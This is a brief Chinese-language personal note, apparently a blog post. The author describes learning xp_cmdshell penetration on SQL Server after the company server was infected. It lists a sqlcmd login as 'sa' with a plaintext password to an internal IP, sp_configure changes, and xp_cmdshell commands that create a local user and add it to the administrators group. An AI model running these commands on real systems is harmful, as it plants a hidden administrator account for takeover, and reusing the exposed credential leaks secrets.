1. 之前看过不少文档 可以使用 xp_SQLCMD的命令来进行渗透处理, 今天因为公司的服务器又中毒了 自己学习了下.
2. 修改SQLSERVER的设置
远程登录数据库 sqlcmd -S 10.24.160.71 -U sa -P Test6530 修改数据库配置:
sp_configure 'show advanced options',1
go
reconfigure
go
详细错误如图示
3. 修改sqlserver的配置 不然会报错:
修改方法 打开服务 将windows 使用的账户 修改为本地账户
4. 执行 命令添加用户
exec xp_cmdshell 'net user cmdshell Test6530 /add'
修改属主用户组
exec xp_cmdshell 'net localgroup administrators cmdshell /add'
5. 到具体的操作系统下面验证相关的操作.
